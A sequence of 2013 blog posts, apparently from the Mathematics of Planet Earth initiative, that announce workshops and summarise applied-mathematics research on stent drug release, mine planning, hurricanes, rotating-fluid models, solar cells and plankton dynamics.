In April, the National Institute for Mathematical and Biological Synthesis (NIMBioS) will host an Investigative Workshop on “Predictive Models for ERA.” The workshop will bring together a multidisciplinary group of molecular and cell biologists, physiologists, ecologists, mathematicians, computational biologists, and statisticians to explore the challenges and opportunities for developing and implementing models that are specifically designed to mechanistically link between levels of biological organization in a way that can inform ecological risk assessment and ultimately environmental policy and management. The focus will be on predictive systems models in which properties at higher levels of organization emerge from the dynamics of processes occurring at lower levels of organization.

Specific goals are to (1) identify advantages and limitations of various predictive systems models to connect chemically caused changes in organismic and suborganismic processes with outcomes at higher levels of organization that are relevant for environmental management; (2) identify the criteria that models of this kind have to fulfill in order to be useful for informing ecological risk assessment and management; and (3) propose a series of recommendations for further action.

Co-organizing the workshop are Valery Forbes, professor and director of the School of Biological Sciences at University of Nebraska, Lincoln and Richard Rebarber, professor of mathematics, also at UNL.

If you have an interest in these topics, the workshop is still accepting applications. The application deadline is Jan. 20, 2014. Individuals with a strong interest in the topic, including post-docs and graduate students, are encouraged to apply. Click here for more information and on-line registration.

NIMBioS Investigative Workshops focus on broad topics or a set of related topics, summarizing/synthesizing the state of the art and identifying future directions. Organizers and key invited researchers make up approximately one half the 30-40 participants in a workshop, and the remaining 15-20 participants are filled through open application from the scientific community. If needed, NIMBioS can provide support (travel, meals, lodging) for Workshop attendees.

Posted in Ecology, Risk Analysis, Workshop Announcement | Leave a comment

Mathematical Models Enhance Current Therapies for Coronary Heart Disease

Equations help explain key parameters of stents that combat artherosclerosis

Coronary heart disease accounts for 18% of deaths in the United States every year. The disease results from a blockage of one or more arteries that supply blood to the heart muscle. This occurs as a result of a complex inflammatory condition called artherosclerosis, which leads to progressive buildup of fatty plaque near the surface of the arterial wall.

In a paper published last month in the SIAM Journal on Applied Mathematics, authors Sean McGinty, Sean McKee, Roger Wadsworth, and Christopher McCormick devise a mathematical model to improve currently-employed treatments of coronary heart disease (CHD).

“CHD remains the leading global cause of death, and mathematical modeling has a crucial role to play in the development of practical and effective treatments for this disease,” says lead author Sean McGinty. “The use of mathematics allows often highly complex biological processes and treatment responses to be simplified and written in terms of equations which describe the key parameters of the system. The solution of these equations invariably provides invaluable insight and understanding that will be crucial to the development of better treatments for patients in the future.”

The accumulation of plaque during CHD can result in chest pain, and ultimately, rupture of the artherosclerotic plaque, which causes blood clots blocking the artery and leading to heart attacks. A common method of treatment involves inserting a small metallic cage called a stent into the occluded artery to maintain blood flow.

Coronary Artery

Cross-section of a coronary artery with plaque buildup: ‘A’ shows inserted deflated balloon catheter; balloon is inflated in ‘B’; ‘C’ shows widened artery. Source: National Heart, Lung, and Blood Institute; National Institutes of Health; U.S. Department of Health and Human Services.
Image source: National Heart, Lung, and Blood Institute; National Institutes of Health; U.S. Department of Health and Human Services.

However, upon insertion of a stent, the endothelium—the thin layer of cells that lines the inner surface of the artery—can be severely damaged. The inflammatory response triggered as a result of this damage leads to excessive proliferation and migration of smooth muscle cells (cells in the arterial wall that are involved in physiology and pathology) leading to re-blocking of the artery. This is an important limitation in the use of stents. One way to combat this has been the use of stents that release drugs to inhibit the smooth muscle cell proliferation, which causes the occlusion. However, these drug-eluting stents have been associated with incomplete healing of the artery. Studies are now being conducted to improve their performance.

“Historically, stent manufacturers have predominantly used empirical methods to design their drug-eluting stents. Those stents which show promising results in laboratory and clinical trials are retained and those that do not are discarded,” explains McGinty. “However, a natural question to ask is, what is the optimal design of a drug-eluting stent?”

The design of drug-eluting stents is severely limited by lack of understanding of the factors governing their drug release and distribution. “How much drug should be coated on the stent? What type of drug should be used?” McGinty questions. “All of these issues, of course, are inter-related. By developing models of drug release and the subsequent uptake into arterial tissue for current drug-eluting stents, and comparing the model solution with experimental results, we can begin to answer these questions.”

The model proposed by the authors considers a stent coated with a thin layer of polymer containing a drug, which is embedded in the arterial wall, and a porous region of smooth muscle cells embedded in an extracellular matrix.

When the polymer region and the tissue region are considered as a coupled system, it can be shown under certain conditions that the drug release concentration satisfies a special kind of integral equation called the Volterra integral equation, which can be solved numerically. The drug concentration in the system is determined from the solution of this integral equation. This gives the mass of drug within cells, which is of primary interest to clinicians.

The simple one-dimensional model proposed in the paper provides analytical solutions to this complex problem. “While the simplified one and two-dimensional models that our group and others have recently developed have provided qualitative results and useful insights into this problem, ultimately three-dimensional models which capture the full complex geometry of the stent and the arterial wall may be required,” McGinty says.

In a complex environment with pulsating blood flow, wound healing, cell proliferation and migration, and drug uptake and binding, the process of drug release from the stent may involve a multitude of factors, which could be best understood by three-dimensional models. “This is especially relevant when we want to consider the drug distribution in diseased arteries and when assessing the performance of the latest stents within complex geometries, where for instance, the diseased artery may bifurcate,” says McGinty. “We are therefore currently investigating the potential benefits of moving to three-dimensional models.”

Source article:
Sean McGinty, Sean McKee, Roger M. Wadsworth, and Christopher McCormick,
Modeling Arterial Wall Drug Concentrations Following the Insertion of a Drug-Eluting Stent,
SIAM Journal on Applied Mathematics, 73(6), 2004–2028. (Online publish date: November 12, 2013).
The source article is available for free access at the link above March 9, 2014.

Posted in Biomedicine, Mathematics | Leave a comment

Workshop “Celestial, Molecular, and Atomic Dynamics” (CEMAD-2013)

A workshop on “Celestial, Molecular, and Atomic Dynamics” (CEMAD-2013) was held at the University of Victoria, Canada, 29 July-2 August, 2013. The workshop was sponsored by the Pacific Institute for the Mathematical Sciences (PIMS) and the University of Victoria, and organized by Florin Diacu (University of Victoria), Gregor Tanner (University of Nottingham, UK), and Andreas Buchleitner (University of Freiburg, Germany).

A continuation of the workshop “Few-Body Dynamics in Atoms, Molecules, and Planetary Systems,” held at the Max Planck Institute for the Physics of Complex Systems in Dresden, Germany, June 28-July 1, 2010, CEMAD-2013 aimed to bring together experts in celestial mechanics and semi-classical theory, as applied to the study of atoms and molecules, for the benefit of all those involved. The main emphasis was on the mathematical aspects of these research fields. The event was a satellite meeting of the Mathematical Congress of the Americas (MCA-2013) and part of Mathematics of the Planet Earth (MPE-2013).

One-hour invited lectures were given by (in alphabetical order):

  • Paula Balseiro, UFF – Rio de Janeiro, Brazil
  • Luis Benet, Mexico City, Mexico,
  • Stefanella Boatto, UFRJ – Rio de Janeiro, Brazil
  • Alessandra Celletti, Rome, Italy
  • Nark Nyul Choi, Kumih, South Korea
  • Holger Dullin, Sydney, Australia
  • Andreas Knauf, Erlangen, Germany  
  • Jacques Laskar, Paris, France
  • Javier Madronero, Munich, Germany
  • Jesús Palacian, Pamplona, Spain
  • Thomas Pfeifer, Heidelberg, Germany
  • Gareth Roberts, Worcester, USA
  • Manuele Santoprete, Waterloo, Canada
  • Cristina Stoica, Waterloo, Canada
  • Susanna Terracini, Torino, Italy
  • Turgay Uzer, Atlanta, USA
  • Patricia Yanguas, Pamplona, Spain
  • Shiqing Zhang, Chengdu, China

Several contributed talks were given during the five days of the meeting. The pleasant atmosphere led to many interesting discussions. The most notable ones were about:

  • connecting the Wannier ridge, which is the single central configuration in helium, with the latest developments in the theory of central configurations;
  • finding the connection between atoms with more than three electrons and various central configurations that occur for the Coulomb potential;
  • generalizing the eZe configurations of the isosceles problem;
  • using the recent achievements in KAM theory to put into the evidence some new periodic orbits in atomic and molecular systems;
  • using the formalism of geometric mechanics to explore the symplectic structure of the equations that describe molecular dynamics;
  • exploring the use of symbolic dynamics and borrow from each other’s experience, for the benefits of all groups involved;
  • using new ways to apply McGehee coordinates in the study of motion near total collisions;
  • finding and investigating new symmetries, both in flat and curved space; and
  • exploring the latest quantum experiments from various mathematical points of view.

The participants deemed the meeting a great success and many of them reinforced the idea that workshops on this topic should continue in the future.

Florin Diacu, University of Victoria

Posted in Workshop Report | Leave a comment

Sustainable Development and Utilization of Mineral Resources

A Stochastic Mine Planning and Production Scheduling Optimization Framework with Uncertain Metal Supply and Market Demand

The sustainable development and utilization of mineral resources and reserves is an area of critical importance to society given the fast growth and demand of new emerging economies and environmental and social concerns. Uncertainty, however, impacts sustainable mineral resource development, including the ability of ore bodies to supply raw materials, operational mining uncertainties, fluctuating market demand for raw materials and metals, commodity prices, and exchange rates.

Throughout the last decade, new technological advances in stochastic modelling, optimization and forecasting of mine planning and production performance have shown to simultaneously enhance production and return on investment. These advances shifted the paradigm in the field, showed initially counterintuitive outcomes that are now well understood, and outlined new areas of research needs. The old paradigm was based on estimating mineral reserves, optimizing mine planning, and production forecasting result in single, often biased and flawed forecasts. These flaws were largely due to the nonlinear propagation of errors associated with ore bodies throughout the chain of mining.

The new stochastic paradigm addresses these limits, and application of the stochastic framework increases net present value (NPV) of mine production schedules (20-30%). It also allows for stochastically optimal pit limits to be about 15% larger in total tonnage when compared to conventionally optimal pit limits, adding about another 10% NPV. Related technical developments also impact: (i) sustainable utilization of mineral resources; (ii) uncertainty quantification and risk management; (iii) social responsibility through improved financial performance; (iv) enhancement of production and product supply; (v) contribution to management of mine remediation; and (vii) objective, technically defendable decision-making.

Ongoing research efforts focus in particular on two interrelated topics, amongst others:

  • Quantification of geological uncertainty / uncertainty in metal supply, including a new high-order modeling framework for spatial data defined based on measures of high-order complexity in spatial architectures, termed spatial cumulants. Cumulants are combinations of moments of statistical parameters that characterize non-Gaussian random fields. To date, research provides definitions, geological interpretations and implementations of high-order spatial cumulants that are used in the high-dimensional space of Legendre polynomials to stochastically simulate complex, non-Gaussian, nonlinear spatial phenomena. Advantages include the (a) absence of distributional assumptions and pre-/postprocessing steps, e.g., data normalization or training image (TI) filtering; (b) use of high-order relations in the data to the simulation process (data-driven, not TI-driven); (c) generation of complex spatial patterns reproducing any data distribution and variograms, and high-order spatial cumulants. The above is an alternative to the multiple point methods applied by our Stanford University colleagues, with additional advantages (data-driven, reconstructs consistently the lower-order spatial complexity in the data used, in addition to high- order). Research directions include the search of new methods for high-order simulation of categorical data (e.g., geology of mineral or petroleum deposits, ground water aquifers, sites for CO2 sequestration), as well as high-order simulations for spatially correlated attributes and principal cumulant decomposition methods.

    All of these developments are critical in modeling the uncertainty in material types and metal content that are extracted from the ground, with particular emphasis on the spatial high-order connectivity of extreme values (high metal content). These models have significant impacts in mine production planning, scheduling and forecasting, from single mines to mineral supply chains.

  • The development of global stochastic optimization techniques for mining complexes / mineral supply chains. These optimization techniques are a core aspect of mine design and production scheduling because they maximize the economic value generated by the production of ore and define a technical plan to be followed from the development of the mine to its closure. This planning optimization is a complex problem to address due to its large scale, the uncertainty in the key parameters involved (geological, mining, financial) and the absence of a method for global or simultaneous optimization of the individual elements of a mining complex or mineral supply chain. The past years, our research in global optimization of mining complexes is addressed through developing a new stochastic optimization framework that integrates multiple mines, multiple processing streams including blending stockpiles and waste dumps designed to meet quality specifications and minimize environmental impact and integrate waste management issues, and transportation methods. The ability to manage and simultaneously optimize all aspects of a mining complex leads to mine plans that not only minimize risk related to environmental impact and rehabilitation, but have previously demonstrated an increase of the economic value, reserves and life-of-mine forecast, thus contributing to the sustainable development of the non-renewable resource.

    Stochastic integer programming has been a core framework in our stochastic optimization efforts. However, the scale of the scheduling and material flow through a mineral supply chain from mines products is very large and requires the development of efficient solution strategies for the proposed formulations which are sought through metaheuristics. For example, a hybrid approach integrating metaheuristics and linear programming permits to link the long-term production schedule with the short-term schedule, whereby the information gleaned from the solution of one can be used to improve the other, leading to a globally optimal and practical mine plans. Extensive testing, applications and benchmarking of the methods being developed are underway and the more promising approaches are being field tested at mine sites with collaborating companies from North to South America, and Africa to Australia.

For more information, see the related webinar available at the McGill web site.

For a short video with simple explanations, see the NSERC website.

Roussos Dimitrakopoulos
roussos.dimitrakopoulos@mcgill.ca

Posted in Optimization, Resource Management | Leave a comment

Article on “Mathematics for Planet Earth, Science for Human Well-being”

This month’s issue of La Gaceta de la RSME—the members’ journal of the Royal Spanish Mathematical Society—features an article by Migel Ángel Herrero (Universidad Complutense de Madrid) under the title “Matemáticas para el planeta Tierra, ciencia para el bienestar humano” (“Mathematics for Planet Earth, Science for Human Well-being”). The article can be downloaded free of charge by clicking here.

The article and the cover images of the four issues of volume 16 of La Gaceta, with short explanations, are a contribution of the Real Sociedad Matemática Española to MPE2013. They can be found on the journal’s web page.

Posted in General | Leave a comment

Kickoff of Mathematics of Planet Earth 2013-Plus (MPE 2013+)


MPE 2013+, which extends MPE2013 into the future, is kicking off in January with a workshop, Mathematics of Planet Earth: Challenges and Opportunities – Introducing Participants to MPE 2013+ Topics, which will be held at Arizona State University January 7-10, 2014. The workshop aims to expose students and junior researchers to the challenges facing our planet, the role of the mathematical sciences in addressing those challenges, and the opportunities to get involved in the effort. Financial support is available to support participants to attend this workshop and to participate in follow-up activities. Some spots are still available. More information on the workshop and financial support is available here.

This workshop feeds into workshops reflecting six themes. In each case, there will be a workshop followed by other activities such as small group meetings, collaborations, miniworkshops, etc. While these activities are planned to initiate in the U.S., we look forward to involving partners all over the world. The initial workshops that reflect these themes are:

  • Workshop on Sustainable Human Environments
    Rapidly growing urban environments present new and evolving challenges. With recent advances in technology, we can infuse our existing infrastructures with new intelligence to sense, analyze, and integrate data, and respond intelligently to the needs of cities’ jurisdictions. This workshop explores the role of data in “smart cities,” anthropogenic biomes, and security.
    Location: DIMACS-Rutgers University, April 23-25, 2014

  • Workshop on Natural Disasters
    No part of the world is impervious to natural disaster. Epidemics, earthquakes, floods, hurricanes, drought, tornadoes, wildfires, tsunamis, and extreme temperatures routinely take their toll. This workshop looks at how computational sciences can help in predicting, monitoring, and responding to such events, and mitigating their effects.
    Location: Georgia Tech, May 13-15, 2015

  • Workshop on Global Change
    The planet is constantly changing, but the pace of change has accelerated as a result of human activity. We need to monitor global change to understand processes leading to change, learn how to mitigate and adapt to its effects, determine if we are meeting goals for our planet, and get early warning of dangerous trends. This workshop explores the observation and metrics used to measure the effects of global change.
    Location: University of California-Berkeley, May 19-21, 2014

  • Workshop on Management of Natural Resources
    To maintain the long-term well-being of the global population, management of the world’s natural resources must emphasize conservation and renewal over depletion and spending. This workshop will investigate challenges for the computational sciences including models and algorithms that describe processes affecting water, forests, and food supplies. They involve complex adaptive systems that interconnect natural systems with human ones, thus calling for understanding of both types of systems.
    Location: Howard University, June 4-6, 2015

  • Workshop on Data-aware Energy Use
    We need to make good choices about today’s energy investments, because they will be with us for a long time. Data can help us make better choices if we can surmount concomitant challenges. This workshop will explore harnessing data to address problems in energy, emphasizing four main areas: energy investment portfolios; smart grid; smart buildings; and electric vehicles.
    Location: UC-San Diego, September 2014

  • Workshop on Education for the Planet Earth of Tomorrow
    The issues facing the planet call for a new type of workforce, trained in multidisciplinary and multinational communication and collaboration. To function in this rapidly changing world, students will need to appreciate the most important concepts at the interface between their discipline and others. There has never been a more crucial time to ensure that we train the next generation of scientists, engineers, and decision makers to be able to think broadly across disciplines. This workshop will bring together the educational findings of the previous five workshops with discussions focusing on workforce development and the MPE education plan.
    Location: NIMBioS University of Tennessee, Fall, 2015

For more information on the MPE 2013+ Program, please click here or contact Eugene Fiorini at mpe2013p@dimacs.rutgers.edu.

Posted in Workshop Announcement | Leave a comment

SIAM Conference — Analysis of Partial Differential Equations

SIAM’s final conference in the year of “Mathematics of Planet Earth” covers the analysis of partial differential equations. This topic relates to developing methods to analyze the equations which result, in many cases, from modeling physical or biological phenomena. While the focus is on the mathematical analysis rather than the physical models, one nevertheless can readily see the contacts to mathematics of planet earth and the power of mathematics to understand world around us.

To cite one example, the conference offers an invited presentation by Philip Maini on “Modelling Collective Cell Motion in Biology.” The talk will consider three different examples of collective cell movement each of which requires different modeling approaches. One involves the movement of cells in epithelial sheets. Another is cranial neural crest cell migration which requires different kind of model. The third is acid-mediated cancer cell invasion, modeled via a coupled system of nonlinear partial differential equations. These can all be expressed using a common framework (nonlinear diffusion equations), which then can be used to understand a range of biological phenomena.

Such is the power of mathematics to develop tools which apply across a wide range of phenomena.

Posted in Conference Announcement, Mathematics | Leave a comment

Wimpy Hurricane Season a Surprise — And a Puzzle for Statisticians

Following are excerpts of an article in the Envirtonment section of today’s Washington Post. It was written by Brian McNoldy.

“It was a hurricane season almost without hurricanes. There were just two, Humberto and Ingrid, and both were relatively wimpy, Category 1 storms. That made the 2013 Atlantic hurricane season, which ended Saturday, the least active in more than 30 years — for reasons that remain puzzling.

The season, from June through November, has an average of 12 tropical storms, of which six to seven grow to hurricane strength with sustained winds of 74 mph or greater. Typically, two storms become “major” hurricanes, Category 3 or stronger, with sustained winds of at least 111 mph.

In 2013, there were 13 tropical storms, a typical number, but for the first time since 1994 there were no major tempests in the Atlantic. The last time there were only two hurricanes was 1982.

The quiet year is an outlier, however, in the recent history of Atlantic cyclones. The National Oceanic and Atmospheric Administration notes that 2013 was only the third calmer-than-average year since 1995.

The most intense storms this year had maximum sustained winds of only about 86 mph. [$\ldots$], the weakest maximum intensity for a hurricane during a season since 1968. The first hurricane, Humberto, was just hours from matching the record for the latest first hurricane, Sept. 11.

In terms of accumulated cyclone energy (ACE), the seasonal total stands at 31.1, the lowest since 1983 and just 30 percent of average. (ACE is the sum of the squares of all of the storms’ peak wind speeds at six-hour intervals, and a good measure of a storm season’s overall power.) Looking back to 1950, only four other years had lower ACE totals: 1972, 1977, 1982 and 1983.

[$\ldots$]

Why was this season so inactive? What did the forecasts miss? Although there are some hypotheses, it is not entirely clear. We may have to wait another couple of months, but in the meantime, there are some potential explanations.

Major signals such as the El Niño Southern Oscillation (ENSO), surface pressure and sea-surface temperature all pointed to an average to above-average season. But there were some possible suppressing factors.

Dry air

Even over the long three-month window of August to October, the vast majority of the tropical Atlantic was dominated by drier-than-normal air, especially in the deep tropics off the coast of Africa. Dry air can quickly weaken or dissipate a tropical cyclone, or inhibit its formation.

Stable air

The average temperature profile in the region was less conducive to thunderstorm growth and development during the core months, which means that the amount of rising air in the region may have been reduced as well.

Weak African Jet Stream

Tropical waves, the embryos of many tropical cyclones, have their origins over continental Africa. A persistent feature called the African easterly jet stream—a fast-moving river of air in the low and middle levels of the atmosphere—extends from Ethiopia westward into the tropical Atlantic Ocean. It breaks down into discrete waves, and every few days another wave leaves the coast. Some are barely noticeable, while others become tropical storms.

During the height of the hurricane season, most tropical cyclones form from disturbances off the coast of Africa. Winds in the jet normally cruise along at 20 to 25 mph at an altitude of 10,000 feet from August to October, but this year they were about 12 to 17 mph weaker. One would expect that to have a big impact on the amplitude of easterly waves and the hurricane season.

Links to Global Warming?

One question that inevitably is asked is how the season’s inactivity relates to climate change. It’s not accurate to associate any particular season (and definitely not a specific storm) with climate change. One season’s activity does not allow any conclusions about the role of climate change. The reason is that intra- and inter-seasonal variability is so large that any subtle signals of influence from climate change are overwhelmed.”

Brian McNoldy is a tropical weather researcher at the University of Miami’s Rosenstiel School of Marine and Atmospheric Science and a contributor to the Capital Weather Gang blog on washingtonpost.com.

Posted in Atmosphere, Extreme Events, Meteorology, Statistics | Leave a comment

Atmosphere and Ocean Dynamics through the Lens of Model Systems

The atmosphere and ocean are central components of the climate system, where each of these components is affected by numerous significant factors through highly nonlinear relationships. It would be impossible to combine all of the important interactions into a single model. Therefore, determining the contribution of each factor, in both a quantitative and qualitative sense, is necessary for the development of a predictive model, not to mention a better understanding, of the climate system.

An approach that is appealing to mathematicians is to construct a hierarchy of models, starting from the most simple, designed to provide a “proof of concept,” and then progressively adding details and complexity, as an understanding of the factors involved in the more simple model is developed and while the necessary analysis tools are developed and refined. The question arises as to how you progress from the simple to the complex, and the challenge is to justify your choice.

One possibility is to study quantitatively accurate mathematical models of what I will call model systems, i.e., the simplification does not come through the mathematical modeling but comes simply by considering a more simple system. For example, the mathematical models of these systems do not require the use of parameterizations of sub-grid scale processes. In not so many words, these systems resemble laboratory experiments that could be, or have been, conducted.

An example of a model system is the differentially heated rotating annulus, which consists of a fluid contained in a rotating cylindrical annulus while the rotation rate and the temperature difference between the inner and outer walls of the annulus are varied (see figure). Systems of this type produce an intriguing variety of flow patterns that resemble those observed in actual geophysical flows [5]. Thus, a careful study of this system is not only inherently interesting from a nonlinear dynamics/pattern formation perspective, but can also provide insight into the dynamical properties of large-scale geophysical fluids.



Figure 1: The differentially heated rotating annulus (left) and an example of a rotating wave (right), which is represented by a snapshot of a horizontal cross-section. The rotating wave rotates at constant phase speed, where the colours represent the fluid temperature (blue is cold, red is hot), and the arrows represent the fluid velocity.

The study of model systems is appealing for a number of reasons. First, although still very challenging, an analysis of mathematical models of these systems may be feasible if appropriate numerical methods are considered. For example, numerical bifurcation techniques for large-scale dynamical systems as discussed in [1] can be useful in the analysis of these systems. See, e.g. [4], in which bifurcation methods are applied to the differentially heated rotating annulus. Also, unlike realistic large-scale models, the results of the analysis may be quantitatively verified by comparison with observations from laboratory experiments, providing a very stringent test on the validity of any new numerical method or analysis technique that you may use.

I have emphasized the mathematical perspective, but, of course, the experiments themselves are invaluable in developing an understanding of physical phenomena of interest.

Such an approach can also be applied even when the corresponding model system cannot be replicated in the laboratory. For example, in [2] and [3], we study a model of a fluid contained in a rotating spherical shell that is subjected to radial gravity and an equator-to-pole differential heating. The results show that as the differential heating is increased, a transition from a one-cell pattern to a two- or three-cell pattern is observed, and we show that this transition is associated with a cusp bifurcation. It is also argued that this transition may be related to the expansion of the Hadley cell that has been observed in Earth’s atmosphere.

Although this approach is “standard” and has fruitfully been used for many years [5], I don’t believe that it has been fully exploited in the context of atmospheric and ocean dynamics. However, it seems that recently it has received increased interest. This is evidenced by a forthcoming book entitled Modelling Atmospheric and Oceanic Flows: Insights from laboratory experiments and numerical simulations [6], and a EUROMECH workshop of the same name that took place at the Freie Universität Berlin in September 2013 (see the workshop‘s webpage: http://euromech552.mi.fu-berlin.de/ for details). In other words, the book and workshop are focused on model systems that are studied using laboratory experiments and numerical methods with the goal of developing an understanding of atmospheric and oceanic fluid flow. The workshop was an excellent example of how bringing together open-minded people from a variety of backgrounds can lead to insight into particular issues and potentially fruitful collaborations. In particular, at the workshop, there was a very interesting mix of meteorologists, oceanographers, physicists and mathematicians. To give an idea of the variety of interesting topics that were covered, I will simply list the five plenary talks: (1) Jan-Bert Flor, from CNRS and Université de Grenoble, spoke about studying small and large scale frontal instabilities using a two-layer fluid contained in a cylindrical annulus and forced by a rotating disk at the surface; (2) Laurette Tuckerman, from the École Supérieure de Physique et de Chimie Industrielles de la Ville de Paris (ESPCI) spoke about numerical bifurcation methods for fluid dynamics problems; (3) Leo Maas, from the Royal Netherlands Institute for Sea Research (NIOZ) and the Institute for Meteorology and Oceanography Utrecht (IMAU), spoke about using both theory and experiment to study inertial waves, and their possible relationship to wave-driven flows; (4) Uwe Harlander, from Brandenburg University of Technology, spoke about using orthogonal decomposition methods to better understand the flow in the differentially heated rotating annulus , and (5) Peter Read, from the University of Oxford, spoke about using experiments to study various flow features such as heat and tracer transport, and discussed how the model systems relate to their geophysical counterparts.

For more information, I suggest the interested reader keep an eye out for the forthcoming book [6]. Many of the workshop attendees have contributed to the book, and it will certainly contain much more information about the variety of atmospheric and oceanic phenomena that are being studied using model systems.

References:
[1] H.A. Dijkstra and others. Numerical bifurcation methods and their application to fluid dynamics. Commun. Comput. Phys., 15(1):1-45, 2014.
[2] W.F. Langford and G.M. Lewis. Poleward expansion of Hadley cells. Can. Appl. Math. Quart., 17(1):105–119, 2009.
[3] G.M. Lewis and W.F. Langford. Hysteresis in a rotating differentially heated spherical shell of Boussinesq fluid. SIAM J. Appl. Dyn. Syst., 7(4):1421–1444, 2008.
[4] G.M. Lewis, N. Périnet, and L. van Veen. The primary flow transition in the baroclinic annulus: Prandtl number effects. In T. von Larcher and P.D. Williams, editors, Modelling Atmospheric and Oceanic Flows, Geophysical Monograph Series. Geopress, Amsterdam, 2014.
[5] P.L. Read. Dynamics and circulation regimes of terrestrial planets. Planet. Space Sci., 59:900–914, 2011.
[6] T. von Larcher and P.D. Williams, editors. Modelling Atmospheric and Oceanic Flows. Insights from laboratory experiments and numerical simulations. Geophysical Monograph Series. Geopress, Amsterdam, 2014.

Greg Lewis
Faculty of Science, UOIT
2000 Simcoe St. North
Oshawa, ON, Canada,L1H 7K4
Greg.Lewis@uoit.ca

Posted in Atmosphere, Climate Modeling, Ocean | Leave a comment

Kofi Annan on Climate Politics

For the blog today we recommend reading what Kofi Anan wrote for the New York Times this week.

There’s no mathematics in it, but it’s important. Anan writes, “If governments are unwilling to lead when leadership is required, people must. We need a global grass-roots movement that tackles climate change and its fallout.”

The MPE2013 initiative is something of a grass roots movement which is concerned with many issues big and small, including climate change. The mathematical sciences community has focused on these issues perhaps more this year than other years. We need to continue.

Happy Thanksgiving from everyone at AIM!

Brian Conrey
American Institute of Mathematics

Posted in Climate Change, Political Systems | Leave a comment

Life on the Edge – Mathematical Insights Yield Better Solar Cells

Last Tuesday I had the pleasure of attending the Third Annual Mitacs Awards ceremony in Ottawa. These awards recognize the outstanding R&D innovation achievements of the interns supported by the various Mitacs programs—Accelerate, Elevate and Globalink. This year, I was particularly inspired by the story of the winner of the undergraduate award category, a Globalink intern from Nanjing University in China named Liang Feng. The Globalink program invites top-ranked undergraduate students from around the world to engage in four month research internships at universities across Canada. Liang Feng spent this summer in the lab of Professor Jacob Krich of the University of Ottawa Physics Department studying Intermediate Band (IB) photovoltaics, a technology that is being used to design the next generation of solar cells.

Modern solar cells are based on silicon and other semiconductor materials and have been around for nearly 60 years. The first practical device, the “solar battery”, was invented in Bell Labs in 1954 and achieved 6% efficiency in converting incident sunlight into electricity. By 1961, it was determined that the “theoretical limit” for solar cell efficiency based on p-n semiconductors is 33.7%. As with many theoretical limits, creative scientists have found ways to break the rules, and the best solar cells today use multilayer structures and exotic materials to achieve more than 44% efficiency in converting sunlight into electricity.

Photovoltaic band gap diagram

Photovoltaic band gap diagram courtesy Jacob Krich, University of Ottawa

In IB solar cells, additional semiconducting materials such as quantum dots are added to make it easier for electrons to be liberated by sunlight. Instead of requiring a single higher energy photon to knock an electron from the Valence Band (VB) to Conduction Band (CB), the job can now be done by two or more low energy photons. Thus more of the sunlight’s spectrum is harnessed by the cell by providing electrons with several possible steps on their staircase to freedom.

The challenge for physicists to design such cells is: how will electrons behave at the interfaces between the materials? Physicists use computational device models to design and model the behavior of multilayer cells. The best device models are both accurate and also computationally inexpensive, though in practice as approximations are made, the models become simpler to evaluate but less accurate. Professor Krich assigned Liang Feng the task of improving the model he’d developed over the previous years, which allowed him to bring his mathematical and physical intuition to bear on the problem. According to Krich:

The most sophisticated previously-existing IBSC device models all made an approximation that the boundary condition at the interface between a standard semiconductor and the intermediate-band semiconductor should be Ohmic, meaning that electrical current flows freely through it. This boundary condition was motivated by an analogous structure, the p-i-n diode, in which it is quite successful. Liang immediately disliked the Ohmic boundary condition for the case. While I gave him the standard explanations as to why it was an appropriate approximation, he came back to me time and again with different arguments as to why the Ohmic condition simply could not be accurate. His own persistence, intuition, and mathematical and computational abilities led him to his somewhat radical hypothesis (i.e., all previously published models for IBSC’s fail in a large range of cases), which he then convincingly proved.
Liang Feng has made a significant and original contribution to improving device modeling for intermediate band solar cells. His achievement is truly his alone, because I actively discouraged him from pursuing it for several weeks. It is no exaggeration to say that this change may significantly aid the development of highly efficient and affordable solar cells.

The outstanding achievement by Liang Feng during his Globalink internship is a great example of how surprising advances in the mathematical sciences are often driven by individual creativity and persistence in the face of skepticism. Through such thinking we consistently discover that theoretical limits are only temporary obstacles on the road of innovation.

Dr. Arvind Gupta,
CEO & Scientific Director
Mitacs

Posted in Mathematics, Renewable Energy | 2 Comments

Ocean Plankton and Ordinary Differential Equations

Ocean Plamkton As applied mathematicians we love differential equations. So, if you are looking for an interesting set of ordinary differential equations (ODEs) with relevance for Planet Earth that is a bit more complicated than the predator-prey models, you might take a look at the so-called NPZ model of biogeochemistry. The N, P, and Z stand for nutrients, phytoplankton, and zooplankton, respectively (or, rather, for the nitrogen concentrations in these species), and the NPZ model describes the evolution of the plankton population in the ocean,
\begin{align*}
\frac{dP}{dt} &= f(I) g(N) P – h ( P ) Z – i ( P ) P , \\
\frac{dZ}{dt} &= \gamma h( P ) Z – j( Z ) Z , \\
\frac{dN}{dt} &= – f(I) g(N) P + (1 – \gamma) h( P ) Z + i( P ) P + j(Z) Z .
\end{align*}
The first equation gives the rate of change of the phytoplankton; phytoplankton increases (first term) due to nutrient uptake ($g$), which is done by photosynthesis in response to the amount of light available ($f$), and decreases due to zooplankton grazing (second term, $h$) and death and predation by organisms not included in the model (third term, $i$). The second equation gives the rate of change of the zooplankton; zooplankton increases (first term) due to grazing ($h$), but only a fraction $\gamma$ of the harvest is taken up, and decreases due to death and predation by organisms not included in the model (second term, $j$). The third equation gives the rate of change of the nutrients; nutrients are lost due to grazing by phytoplankton (first term, $f$ and $g$) and increased by the left-over fraction $1-\gamma$ of harvested zooplankton (second term, $h$) and the remains of phytoplankton (third term, $i$) and zooplankton (fourth term, $j$).

Note that the right-hand sides of the equations sum to zero, so the NPZ model conserves the total amount of nitrogen in the system,
\[
(N+P+Z) (t) = (N+P+Z) (0) , \quad t \in \mathbb{R} .
\]
The most common use of NPZ models is for theoretical investigations, to see how the model behaves if different transfer functions are used.

A survey of the merits and limitations of the NPZ model is given in the review article P. J. Franks, “NPZ models of plankton dynamics: Their construction, coupling to physics, and application,” Journal of Oceanography, 58 (2002), pp. 379–387, with an interesting follow-up article by the same author, Peter S. Franks, “Planktonic ecosystem models: perplexing parameterizations and a failure to fail,”, Journal of Plankton Research, 31 (2009), pp. 1299–1306. See also the recent textbook by H. Kaper and H. Engler, “Mathematics and Climate,” Chapter 18, OT131, SIAM, Philadelphia (2013).

Posted in Biogeochemistry, Dynamical Systems | Leave a comment

Paleo-Structure Modeling of the Earth’s Mantle

“Paleo-structure modeling of the Earth’s mantle will provide crucial information on the history of plate-driven forces, the material properties of the deep Earth, the temporal evolution of the core-mantle boundary, as well as a deeper understanding of the development of sedimentary basins, thereby advancing us into an era of integrated investigations that will alter our view of the Earth system.” So concludes an article in the December 2013 issue of SIAM News.

